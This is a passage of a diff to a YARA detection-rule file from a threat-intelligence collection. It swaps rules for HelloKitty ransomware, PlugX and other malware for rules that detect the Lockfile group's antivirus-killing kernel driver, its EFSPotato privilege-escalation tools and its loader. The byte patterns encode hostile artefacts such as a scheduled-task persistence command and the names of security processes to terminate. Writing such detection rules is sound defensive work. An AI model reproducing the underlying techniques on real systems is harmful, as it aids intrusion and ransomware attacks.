-		$s2 = { 0a 6c 61 73 74 5f 6c 69 74 20 25 75 2c 20 6c 61 73 74 5f 64 69 73 74 20 25 75 2c 20 69 6e 20 25 6c 64 2c 20 6f 75 74 20 7e 25 6c 64 28 25 6c 64 25 25 29 }
-		$s3 = { 70 65 6e 53 43 4d 61 6e 61 67 65 72 20 66 61 69 6c 65 64 20 28 25 64 29 0a }
-		$s4 = { 43 72 65 61 74 65 53 65 72 76 69 63 65 20 66 61 69 6c 65 64 20 28 25 64 29 0a 00 00 00 00 00 00 53 65 72 76 69 63 65 20 69 6e 73 74 61 6c 6c 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 0a }
-		$s5 = { 49 8b cd ff 15 56 22 07 00 c6 05 87 7b 0a 00 00 c7 05 81 7b 0a 00 60 ea 00 00 49 83 c9 ff 45 33 c0 48 8d 55 20 48 8d 0d f3 7b 0a 00 e8 26 a4 ff ff 49 83 c9 ff 45 33 c0 48 8d 55 00 48 8d 0d bc 7b 0a 00 e8 0f a4 ff ff 41 b8 07 00 00 00 48 8d 15 92 b8 08 00 48 8d 0d 03 7c 0a 00 e8 16 a3 ff ff 49 83 c9 ff 45 33 c0 48 8d 55 40 48 8d 0d 6c 7b 0a 00 e8 df a3 ff ff 41 b8 ?? 00 00 00 48 8d 15 6a b8 08 00 48 8d 0d 13 7c 0a 00 e8 e6 a2 ff ff 48 8d 1d 0f 7d 0a 00 48 8b c3 48 83 3d 1c 7d 0a 00 08 48 0f 43 05 fc 7c 0a 00 48 89 44 24 58 48 8d 05 a0 03 00 00 48 89 44 24 60 48 89 7c 24 68 48 89 7c 24 70 48 8d 4c 24 58 ff 15 4e 21 07 00 85 c0 75 29 48 83 3d e2 7c 0a 00 08 48 0f 43 1d c2 7c 0a 00 48 8b d3 33 c9 ff 15 37 21 07 00 48 85 c0 74 09 48 8b c8 ff 15 f1 20 07 00 83 7c 24 30 02 7f 5d 48 8d 44 24 48 48 89 44 24 28 89 7c 24 20 45 33 c9 4c 8d 05 0a 71 ff ff 33 d2 33 c9 ff 15 60 22 07 00 48 8d 44 24 50 48 89 44 24 28 89 7c 24 20 45 33 c9 4c 8d 05 a8 95 ff ff 33 d2 33 c9 ff 15 3e 22 07 00 83 ca ff 48 8b c8 ff 15 f2 20 07 00 b9 64 00 00 00 ff 15 47 22 07 }
-		$s6 = { 48 89 7d f0 48 89 7d f8 45 33 c0 33 d2 48 8d 4d e0 e8 43 a7 ff ff 41 b8 2c 00 00 00 48 8d 15 be bc 08 00 48 8d 4d e0 e8 ad a7 ff ff 48 89 7d 70 48 89 7d 78 45 33 c0 33 d2 48 8d 4d 60 e8 17 a7 ff ff 45 33 c0 48 8d 15 77 94 08 00 48 8d 4d 60 e8 84 a7 ff ff 83 7c 24 30 02 75 6e 48 8d 85 a8 00 00 00 48 89 85 a0 00 00 00 41 b8 03 00 00 00 49 8b 55 08 48 8d 8d a0 00 00 00 e8 c9 0a 00 00 48 8b 95 a0 00 00 00 48 8d 4d a0 e8 89 a5 ff ff 48 8d 85 a8 00 00 00 48 8b 8d a0 00 00 48 89 85 b0 10 00 00 48 8b da 48 8b f9 33 f6 89 74 24 78 c7 45 80 18 00 00 00 c7 45 90 01 00 00 00 48 89 75 88 45 33 c9 4c 8d 45 80 48 8d 54 24 68 48 8d 4c 24 60 ff 15 81 fe 06 00 45 33 c0 8d 56 01 48 8b 4c 24 60 ff 15 68 fe 06 00 45 33 c9 4c 8d 45 80 48 8d 54 24 70 48 8d 4c 24 58 ff 15 59 fe 06 00 45 33 c0 8d 56 01 48 8b 4c 24 58 ff 15 40 fe 06 00 33 c0 48 89 45 98 48 89 45 a0 48 89 45 a8 33 d2 44 8d 46 68 48 8d 4d c0 e8 ab 89 04 00 c7 45 c0 68 00 00 00 48 8b 44 24 68 48 89 45 20 48 8b 44 24 70 48 89 45 18 81 4d fc 00 01 00 00 48 8b d3 48 8d 4d 30 e8 bf fe ff ff 90 4c 8b c0 48 8d 8d 90 00 00 00 e8 9f 0d 00 00 90 45 33 c0 b2 01 48 8d 4d 30 e8 d0 7d ff ff 48 8d 95 90 00 00 00 48 83 bd a8 00 00 00 08 48 0f 43 95 90 00 00 00 48 8d 45 98 48 89 44 24 48 48 8d 45 c0 48 89 44 24 40 48 89 74 24 38 48 89 74 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 a7 fd 06 00 48 8b 4c 24 68 ff 15 94 fd 06 00 48 8b 4c 24 70 ff 15 89 fd 06 00 48 89 b5 80 00 00 00 48 89 b5 88 00 00 00 }
+		$s1 = "find %s!\n" fullword ascii
+		$s2 = "killed %s!\n" fullword ascii
+		$s3 = "DbgPrint" fullword ascii
+		$s4 = "ntoskrnl.exe" fullword ascii
+		$s5 = "SBPIMSvc.exe" fullword ascii
+		$s6 = "MsMpEng.exe" fullword ascii
+		$s7 = { 48 8b ce ff 15 92 cf ff ff 48 8b d0 48 8b cb ff 15 8e cf ff ff 48 8d 7f 08 85 c0 74 0d 48 8b 1f 44 38 23 75 db e9 a7 00 00 00 48 8b ce ff 15 68 cf ff ff 48 8b d0 48 8d 0d 6e bf ff ff ff 15 70 cf ff ff 48 8b ce ff 15 37 cf ff ff 8b c8 48 8d 54 24 40 ff 15 3a cf ff ff 85 c0 78 56 48 8b 4c 24 40 48 8d 84 24 a8 00 00 00 48 89 44 24 30 45 33 c9 44 88 64 24 28 45 33 c0 33 d2 4c 89 64 24 20 ff 15 04 cf ff ff 85 c0 74 05 45 32 f6 eb 41 48 8b 8c 24 a8 00 00 00 33 d2 ff 15 0b cf ff ff 48 8b 8c 24 a8 00 00 00 ff 15 0d cf ff ff 41 b6 01 eb 05 45 84 f6 74 19 48 8b ce ff 15 da ce ff ff 48 8b d0 48 8d 0d f0 be ff ff ff 15 e2 ce ff ff 48 8b ce ff 15 a1 ce ff ff 48 83 }
+		$s8 = "UpdaterUI.exe" fullword ascii
+		$s9 = "VipreNis.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 80KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 3KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_SP_Vault7_SIG_F_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Kernel_Driver_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect open-source PasswordReminder recovery tools used by Chinese APT in the Past"
+		description = "Detect kernel driver used by lockfile group"
 		author = "Arkbird_SOLG"
-		id = "0b65e333-16e2-57c3-84f0-5cd24c9d9593"
-		date = "2020-11-30"
-		modified = "2020-11-30"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-30/SP_Vault7_SIG_F_Nov_2020_1.yar#L1-L23"
+		id = "80bf5286-6da6-5380-ad14-345d8122d3d4"
+		date = "2021-08-28"
+		modified = "2021-08-29"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_Kernel_Driver_Aug_2021_1.yara#L1-L21"
 		license_url = "N/A"
-		logic_hash = "b03ffb433491b532d891f29aeb5b33c6578067f2f05845514a7bdc1e50f88a10"
+		logic_hash = "225bd5995d3f1ed4c0bcb43c862662c9e5badd96a87d779d3bc6f1809d0ce3bb"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		hash1 = "e6e17f2b2ce0ae07cf48654156b79ee90d330961456f731e84c94f50fe34f802"
-		hash2 = "c224ee5bef42a45e84e0d5a409d8b4c3842b2a7ac3fe5006ee795e64e0778e6e"
+		hash1 = "5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f"
+		hash2 = "0d18c704049700efd1353055b604072d94bcc3e5f4aa558adf8b8f8848330644"
+		hash3 = "2b7ffe47b3fabf81a76386ee953d281aeaa158f4926896fcc1425c3844e73597"
+		hash4 = "61423a95146d5fca47859e43d037944edb32f2004d86e14c7a522270bde6e2a8f"
+		adversary = "Lockfile"
 
 	strings:
-		$dbg1 = { 50 61 73 73 77 6f 72 64 52 65 6d 69 6e 64 65 72 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 69 6e 64 20 57 69 6e 4c 6f 67 6f 6e 20 6f 72 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 20 4e 57 47 49 4e 41 2e 44 4c 4c 2e 0a }
-		$dbg2 = { 54 68 65 20 65 6e 63 6f 64 65 64 20 70 61 73 73 77 6f 72 64 20 69 73 20 66 6f 75 6e 64 20 61 74 20 30 78 25 38 2e 38 6c 78 20 61 6e 64 20 68 61 73 20 61 20 6c 65 6e 67 74 68 20 6f 66 20 25 64 2e 0a }
-		$dbg3 = { 50 61 73 73 77 6f 72 64 52 65 6d 69 6e 64 65 72 20 69 73 20 75 6e 61 62 6c 65 20 74 6f 20 66 69 6e 64 20 74 68 65 20 70 61 73 73 77 6f 72 64 20 69 6e 20 6d 65 6d 6f 72 79 2e 0a }
-		$dbg4 = { 20 55 73 61 67 65 3a 20 25 73 20 44 6f 6d 61 69 6e 4e 61 6d 65 20 55 73 65 72 4e 61 6d 65 20 50 49 44 2d 6f 66 2d 57 69 6e 4c 6f 67 6f 6e 0a 0a }
-		$dbg5 = { 54 68 65 20 6c 6f 67 6f 6e 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 69 73 3a 20 25 53 2f 25 53 2f 25 53 2e 0a }
-		$dbg6 = { 54 68 65 20 57 69 6e 4c 6f 67 6f 6e 20 70 72 6f 63 65 73 73 20 69 64 20 69 73 20 25 64 20 28 30 78 25 38 2e 38 6c 78 29 2e 0a }
-		$dbg7 = { 59 6f 75 20 6c 6f 67 67 65 64 20 6f 6e 20 61 74 20 25 64 2f 25 64 2f 25 64 20 25 64 3a 25 64 3a 25 64 0a }
-		$dbg8 = { 54 68 65 20 68 61 73 68 20 62 79 74 65 20 69 73 3a 20 30 78 25 32 2e 32 78 2e 0a }
-		$dbg9 = { 53 55 56 57 68 14 ?? 40 00 e8 17 0c 00 00 8b 6c 24 1c [1-4] 45 00 50 68 e0 ?? 40 00 e8 ?? ?? 00 00 83 c4 ?? e8 ?? 02 00 00 85 c0 75 1d e8 ?? 02 00 00 85 c0 75 14 68 b4 ?? 40 00 e8 ?? 0b 00 00 83 c4 04 33 c0 5f 5e 5d 5b }
+		$s1 = "\\BaseNamedObjects\\{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword wide
+		$s2 = "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%ws" fullword wide
+		$s3 = "\\DosDevices\\%wS" fullword wide
+		$s4 = "%temp%\\" fullword wide
+		$s5 = { 5b 2b 5d 20 50 72 6f 63 65 73 73 20 6f 62 6a 65 63 74 20 28 45 50 52 4f 43 45 53 53 29 20 66 6f 75 6e 64 2c 20 30 78 25 6c 6c 58 0d 0a 00 00 00 5b 2b 5d 20 45 50 52 4f 43 45 53 53 2d 3e 50 53 5f 50 52 4f 54 45 43 54 49 4f 4e 2c 20 30 78 25 6c 6c 58 }
+		$s6 = { 48 8b 4e 20 41 b9 00 08 00 00 4d 8b c7 49 8b d5 41 ff 54 24 70 85 c0 75 09 48 8d 15 [2] 02 00 eb 49 48 8d 0d [2] 02 00 e8 b9 ef ff ff 48 8d 0d [2] 02 00 e8 ad ef ff ff 4c 8d 85 f0 02 00 00 ba 00 00 00 c0 48 8d 0d [2] 02 00 e8 [2] 00 00 ba d0 07 00 00 49 8b ce ff 15 [2] 01 00 85 c0 74 15 48 8d 15 [2] 02 00 b9 01 00 00 00 e8 [2] 00 00 33 db eb 0b 48 8b d7 48 8b ce e8 4b f3 ff ff 49 8b ce ff 15 }
 
 	condition:
-		uint16( 0 ) == 0x4d5a and filesize > 50KB and 6 of them
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_ELF_Hellokitty_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_Tool_Efspotatoe_Aug_2021_2 : FILE
 {
 	meta:
-		description = "Detect HelloKitty ransomware"
+		description = "Detect EFSPotatoe tool (Generic rule)"
 		author = "Arkbird_SOLG"
-		id = "3e83f07a-0ee7-5381-9aba-2606c01b9d91"
-		date = "2021-08-14"
-		modified = "2021-08-14"
+		id = "f40673da-7b16-5657-ba9a-f3f13034ad12"
+		date = "2021-08-27"
+		modified = "2021-08-29"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-14/HelloKitty/RAN_ELF_HelloKitty_Aug_2021_1.yara#L1-L17"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/Tool_EFSPotatoe_Aug_2021_2.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "99816756ea0a680eb25da192c9f069082f6479befe4e50188ad8f90b323d1f2d"
+		logic_hash = "eedad68d3192908fea2109c7fa51a2e38e31ed666424307318ac2123b95d1cd3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "ca607e431062ee49a21d69d722750e5edbd8ffabcb54fa92b231814101756041"
-		hash2 = "b4f90cff1e3900a3906c3b74f307498760462d719c31d008fc01937f5400fb85"
-		tlp = "White"
-		adversary = "RAAS"
+		hash1 = "c372c54b11465688201e2d48ffd5fd5b0ca49360858a70ce8413f5c9e24c8050"
+		hash2 = "441cb0576151b2e5b5127be72a5bcdf3577a596f0a4e1f2c6836248fe07eb818"
+		hash3 = "47b85abee8a07e79ad95f48a3e3addf7235144b67b0350e2f9ac80e66f97e583"
+		hash4 = "7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd"
+		adversary = "-"
 
 	strings:
-		$seq1 = { 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 05 ?? 13 21 00 48 8b 3d ?? 14 21 00 48 89 e9 ba ?? 0c 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e2 ff ff 48 8b 3d ?? 14 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 05 ?? 13 21 00 48 8b 3d ?? 12 21 00 48 89 e9 ba ?? 0c 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e2 ff ff 48 8b 05 [2] 21 00 b9 ?? 0c 41 00 ba 80 00 00 00 be 01 00 00 00 4c 89 e7 48 8b 04 18 44 8b 00 31 c0 e8 ?? e5 ff ff 4c 89 e7 e8 cd 10 00 00 48 85 c0 49 89 c7 0f 84 9b 00 00 00 48 83 3d ?? 13 21 00 00 74 60 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 ?? e3 ff ff 48 8b 05 ?? 12 21 00 48 8b 3d ?? 13 21 00 48 89 e9 ba [2] 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e1 ff ff 48 8b 3d ?? 13 21 00 e8 ?? e6 ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 05 ?? 12 21 00 48 8b 3d [2] 21 00 48 89 e9 ba [2] 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e1 ff ff }
-		$seq2 = { 31 c0 b9 40 00 00 00 48 89 ef f3 ab be ?? 0d 41 00 48 89 df e8 [2] ff ff 48 85 c0 49 89 c5 0f 84 4c 01 00 00 48 89 c2 48 89 de 48 89 ef 48 29 da e8 71 07 00 00 be 3a 00 00 00 48 89 ef e8 [2] ff ff 48 8d 78 01 e8 [2] ff ff 85 c0 41 89 c7 0f 84 04 01 00 00 bf 10 00 00 00 e8 ?? dd ff ff 4c 89 ef 44 89 38 49 89 c6 48 89 04 24 e8 3d f5 ff ff 48 83 3d ?? 0e 21 00 00 49 89 46 08 74 6f 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 04 24 48 8b 0d ?? 0d 21 00 ba ?? 0d 41 00 48 2b 0d ?? 0d 21 00 48 8b 3d ?? 0e 21 00 be 01 00 00 00 4c 8b 48 08 44 8b 00 31 c0 48 c1 f9 03 48 ff c1 e8 ?? dc ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 04 24 48 8b 0d [2] 21 00 be 01 00 00 00 48 2b 0d [2] 21 00 48 8b 3d ?? 0c 21 00 ba ?? 0d 41 00 4c 8b 48 08 44 8b 00 31 c0 48 c1 f9 03 48 ff c1 e8 [2] ff ff 48 8b 35 [2] 21 00 48 3b 35 [2] 21 00 74 16 48 85 f6 74 07 48 8b 04 24 48 89 06 48 83 05 [2] 21 00 08 eb 0d 48 89 e2 bf e0 49 61 00 e8 af 02 00 00 48 8d 7b 01 be ?? 0d 41 00 e8 ?? dd ff ff 48 89 c3 e9 86 fe ff ff 4d 85 e4 74 08 4c 89 e7 e8 [2] ff ff 48 83 3d ?? 0d 21 00 00 74 61 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 0d ?? 0c 21 00 48 2b 0d ?? 0c 21 00 ba ?? 0d 41 00 48 8b 3d ?? 0d 21 00 be 01 00 00 00 31 c0 48 c1 f9 03 e8 ?? db ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 0d ?? 0c 21 00 48 2b 0d [2] 21 00 31 c0 48 8b 3d ?? 0b 21 00 ba ?? 0d 41 00 be 01 00 00 00 48 c1 f9 03 e8 [2] ff ff 48 8b 84 24 18 01 00 00 64 48 33 04 25 28 00 00 }
-		$seq3 = { 48 8d b4 24 90 00 00 00 bf d0 4a 61 00 48 c7 84 24 98 00 00 00 00 00 00 00 48 c7 84 24 90 00 00 00 01 00 00 00 e8 [2] ff ff e8 ?? 22 00 00 89 44 24 08 8b 05 [2] 21 00 89 d9 44 8b 0d [2] 21 00 44 8b 05 [2] 21 00 ba ?? 0e 41 00 48 8b 3d [2] 21 00 be 01 00 00 00 89 04 24 31 c0 e8 ?? f8 ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 31 f6 ba 0a 00 00 00 bf 40 4a 61 00 e8 ?? fa ff ff ba 0a 00 00 00 31 f6 bf 20 4a 61 00 e8 ?? fa ff ff be 01 00 00 00 bf 11 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 14 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 16 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 15 00 00 00 e8 [2] ff ff 83 3d ?? 28 21 00 00 }
+		$s1 = { 5c 00 70 00 69 00 70 00 65 00 5c 00 6c 00 73 00 61 00 72 00 70 00 63 }
+		$s2 = "ncacn_np" fullword wide
+		$s3 = { 5c 00 5c 00 25 00 73 00 5c 00 [1-20] 00 5c 00 [1-20] 00 }
+		$s4 = { 63 00 36 00 38 00 31 00 64 00 34 00 38 00 38 00 2d 00 64 00 38 00 35 00 30 00 2d 00 31 00 31 00 64 00 30 00 2d 00 38 00 63 00 35 00 32 00 2d 00 30 00 30 00 63 00 30 00 34 00 66 00 64 00 39 00 30 00 66 00 37 00 65 }
+		$s5 = { 00 72 48 02 00 70 28 0e 00 00 0a 73 15 00 00 0a 6f 16 00 00 0a 28 0a 00 00 0a 28 06 00 00 0a 00 38 4a 02 00 00 }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and filesize > 20KB and all of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_Mal_Plugx_Thor_July_2021_1 : FILE
+rule ARKBIRD_SOLG_Tool_Efspotatoe_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect Thor variant of PlugX (Variant 1)"
+		description = "Detect custom .NET variant EFSPotatoe tool"
 		author = "Arkbird_SOLG"
-		id = "5447e5df-0326-5987-905b-bfc49acee05a"
-		date = "2021-07-27"
-		modified = "2021-07-28"
-		reference = "https://unit42.paloaltonetworks.com/thor-plugx-variant/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-27/PlugX/Mal_PlugX_Thor_July_2021_1.yara#L1-L20"
+		id = "614a6543-89ce-5f75-9933-766fd1e5458b"
+		date = "2021-08-27"
+		modified = "2021-08-29"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/Tool_EFSPotatoe_Aug_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "f94e6cf8a1169526a438dfbf4d6b40f4ce0f6af6eee2e893fb138b81c4172c73"
+		logic_hash = "a9fed543aeaba380688ec59034b0e8c90fc0bea986085958966101bd44cf480f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "125fdf108dc1ad6f572cbdde74b0c7fa938a9adce0cc80cb5ce00f1c030b0c93"
-		hash2 = "690c488a9902978f2ef05aa23d21f4fa30a52dd9d11191f9b49667cd08618d87"
-		hash3 = "3c5e2a4afe58634f45c48f4e800dc56bae3907dde308ff97740e9cd5684d1c53"
-		hash4 = "a9cbce007a7467ba1394eed32b9c1774ad09a9a9fb74eb2ccc584749273fac01"
-		tlp = "white"
-		adversary = "Chinese APT group"
+		hash1 = "c372c54b11465688201e2d48ffd5fd5b0ca49360858a70ce8413f5c9e24c8050"
+		hash2 = "441cb0576151b2e5b5127be72a5bcdf3577a596f0a4e1f2c6836248fe07eb818"
+		adversary = "Lockfile"
 
 	strings:
-		$s1 = { 55 8b ec 81 ec ?? 01 00 00 a1 00 [2] 10 33 c5 89 45 [2-10] 85 ?? fe ff ff [0-1] c6 85 ?? fe ff ff 5c c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff ?? c6 85 ?? fe ff ff }
-		$s2 = { 8b ?? ?? fe ff ff c6 ?? 00 [3-5] fe ff ff [4-10] fe ff ff }
-		$s3 = { fe ff ff 6a 40 68 00 10 00 00 8b 95 ?? fe ff ff 52 6a 00 ff 95 ?? fe ff ff 89 85 ?? fe ff ff }
+		$s1 = { 5c 00 70 00 69 00 70 00 65 00 5c 00 6c 00 73 00 61 00 72 00 70 00 63 }
+		$s2 = "ncacn_np" fullword wide
+		$s3 = "WinSta0\\Default" fullword wide
+		$s4 = { 11 00 72 cc 01 00 70 28 06 00 00 0a 00 dd de 02 00 00 00 de 12 07 14 fe 01 13 0f 11 0f 2d 07 07 6f 0f 00 00 0a 00 dc 00 28 10 00 00 0a 13 10 12 10 72 16 02 00 70 28 11 00 00 0a 0d 72 1a 02 00 70 09 72 2e 02 00 70 28 12 00 00 0a 13 04 11 04 19 16 1f 0a 20 00 08 00 00 20 00 08 00 00 16 7e 0d 00 00 0a 28 06 00 00 06 13 05 11 05 15 73 13 00 00 0a 28 14 00 00 0a 16 fe 01 13 0f 11 0f 2d 25 00 72 48 02 00 70 28 0e 00 00 0a 73 15 00 00 0a 6f 16 00 00 0a 28 0a 00 00 0a 28 06 00 00 0a 00 38 4a 02 00 00 16 73 17 00 00 0a 13 06 14 fe 06 04 00 00 06 73 18 00 00 0a 73 19 00 00 0a 13 07 11 07 17 6f 1a 00 00 0a 00 11 07 18 8d 01 00 00 01 13 11 11 11 16 11 05 8c 15 00 00 01 a2 11 11 17 11 06 a2 11 11 6f 1b 00 00 0a 00 14 fe 06 03 00 00 06 73 18 00 00 0a 73 19 00 00 0a 13 08 11 08 17 6f 1a 00 00 0a 00 11 08 09 6f 1b 00 00 0a 00 11 06 20 e8 03 00 00 6f 1c 00 00 0a 16 fe 01 13 0f 11 0f 3a 93 01 00 00 00 11 05 28 08 00 00 06 16 fe 01 13 0f 11 0f 3a 7c 01 00 00 00 28 08 00 00 0a 6f 0b 00 00 0a 13 09 72 7c 02 00 70 11 09 8c 15 00 00 01 28 1d 00 00 0a 28 06 00 00 0a 00 12 0a fe 15 08 00 00 02 12 0a 11 0a 28 02 00 00 2b 7d 1d 00 00 04 12 0a 7e 0d 00 00 0a 7d 1e 00 00 04 12 0a 17 7d 1f 00 00 04 12 0b 12 0c 12 0a 20 00 04 00 00 28 0b 00 00 06 26 12 0d fe 15 06 00 00 02 12 0e fe 15 07 00 00 02 12 0e 11 0e 28 03 00 00 2b 7d 0b 00 00 04 12 0e 11 0c 7d 1c 00 00 04 12 0e 11 0c 7d 1b 00 00 04 12 0e 72 9c 02 00 70 7d 0d 00 00 04 12 0e 20 01 01 00 00 7d 16 00 00 04 12 0e 16 7d 17 00 00 04 }
+		$s5 = "EfsPotato <cmd>" wide
+		$s6 = "\\\\.\\pipe\\" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 10KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Babyelephant_Installer_Feb_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Loader_Lockfile_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect Installer from BabyElephant APT"
+		description = "Detect loader used by lockerfile group"
 		author = "Arkbird_SOLG"
-		id = "c89a127d-af49-597e-927d-c9a10c90fabe"
-		date = "2021-02-23"
-		modified = "2021-02-23"
-		reference = "https://twitter.com/h2jazi/status/1363683531067715584"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-23/BabyElephant/APT_BabyElephant_Installer_Feb_2021_1.yar#L1-L21"
+		id = "031335f3-e6c7-5e94-af23-c7fb254203b7"
+		date = "2021-08-28"
+		modified = "2021-08-29"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_loader_Lockfile_Aug_2021_1.yara#L1-L16"
 		license_url = "N/A"
-		logic_hash = "7c4f2cd7e56426e42141b1f2f3a13e1daa01b1de1fe88f4bd135601234407ec9"
-		score = 50
-		quality = 73
+		logic_hash = "622a673d5cb9832cf0abc9942bf0e1f64bcdbd99524dea0bd64698fffa815a9b"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		level = "experimental"
-		hash1 = "d55ff954abb04ec29745f7d80ea7457a862c8025a21e889f1ba44c32ba486a7e"
+		hash1 = "ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291"
+		adversary = "Lockfile"
 
 	strings:
-		$s1 = { 65 63 68 6f 20 25 64 20 3e 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c }
-		$s2 = "COMSPEC" fullword ascii
-		$s3 = { 53 43 48 54 41 53 4b 53 20 2f 43 52 45 41 54 45 20 2f 53 43 20 4d 49 4e 55 54 45 20 2f 4d 4f 20 [1-3] 20 2f 54 4e 20 22 [1-12] 22 20 2f 54 52 20 22 [4-24] 22 20 2f 66 }
-		$s4 = "%s//%s" fullword ascii
-		$s5 = { 53 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 54 4e 20 22 [1-12] 22 20 2f 66 }
-		$s6 = { 83 c4 10 8b d8 e8 13 02 00 00 83 fb ff 74 06 89 38 8b f3 eb 34 83 38 02 74 0f e8 fe 01 00 00 83 38 0d 74 05 83 ce ff eb 20 e8 ef 01 00 00 89 38 56 8d 45 ec b9 c4 3e 42 00 50 51 56 89 4d ec }
-		$s7 = { 68 00 08 00 00 8d 85 48 f6 ff ff 6a 00 50 e8 00 33 00 00 83 c4 0c 8d 85 48 f6 ff ff 6a 00 68 00 08 00 00 50 53 ff d6 85 c0 0f 8e 1f 03 00 00 0f 1f 40 00 6a 08 68 e0 b3 42 00 8d 8d 28 ec ff ff c7 85 38 ec ff ff 00 00 00 00 c7 85 3c ec ff ff 0f 00 00 00 c6 85 28 ec ff ff 00 e8 a3 09 00 00 8d 95 28 ec ff ff c7 45 fc 00 00 00 00 8d 8d 10 ec ff ff e8 2b 05 00 00 83 }
+		$s1 = "c:\\windows\\system32\\calc.exe" fullword ascii
+		$s2 = { 49 48 85 c0 7f ec eb 0a 33 c9 66 89 0c 45 [2] 01 10 68 [2] 00 10 68 [2] 01 10 ff 15 [2] 00 10 6a 00 68 80 00 00 00 6a 03 6a 00 6a 02 68 00 00 00 80 68 [2] 01 10 ff 15 [2] 00 10 83 f8 ff 75 08 6a 00 ff 15 [2] 00 10 50 ff 15 [2] 00 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc }
+		$s3 = "/proc/123/stat" fullword ascii
